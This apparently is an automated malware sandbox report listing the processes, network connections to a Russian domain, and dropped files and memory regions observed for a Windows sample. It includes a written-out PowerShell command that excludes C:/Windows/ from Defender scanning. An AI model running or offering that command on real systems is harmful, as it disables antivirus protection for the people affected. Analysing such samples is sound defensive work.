C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lr5Zi8WiUT.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 cx38856.tw1.ru udp
RU 92.53.96.121:443 cx38856.tw1.ru tcp
RU 92.53.96.121:443 cx38856.tw1.ru tcp

Files

\Users\Admin\AppData\Local\Temp\hwid.exe

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

memory/2768-12-0x0000000000400000-0x0000000001400000-memory.dmp

C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe

memory/2740-23-0x0000000000BF0000-0x0000000000D86000-memory.dmp

\Users\Admin\AppData\Roaming\d3d9.dll

C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat

\comServerRefcrtNet\ComsurrogateHost.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

memory/1540-127-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2440-128-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\bbyzxjhe\bbyzxjhe.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\bbyzxjhe\bbyzxjhe.0.cs

\??\c:\Windows\System32\CSCD632E12AB0041D0975A814584C955D9.TMP

C:\Users\Admin\AppData\Local\Temp\RES8037.tmp

C:\Users\Admin\AppData\Local\Temp\NzET29XDKR.bat

memory/1216-148-0x0000000000340000-0x00000000004FE000-memory.dmp

\??\PIPE\srvsvc

memory/1760-171-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/1760-172-0x0000000000490000-0x0000000000498000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

C:\Users\Admin\AppData\Local\Temp\CabCE39.tmp

C:\Users\Admin\AppData\Local\Temp\TarCE7B.tmp

C:\Users\Admin\AppData\Local\Temp\1QWUF8ga47.bat

memory/2500-274-0x00000000012E0000-0x000000000149E000-memory.dmp

memory/2036-306-0x000000001B530000-0x000000001B812000-memory.dmp

memory/1744-331-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\lr5Zi8WiUT.bat
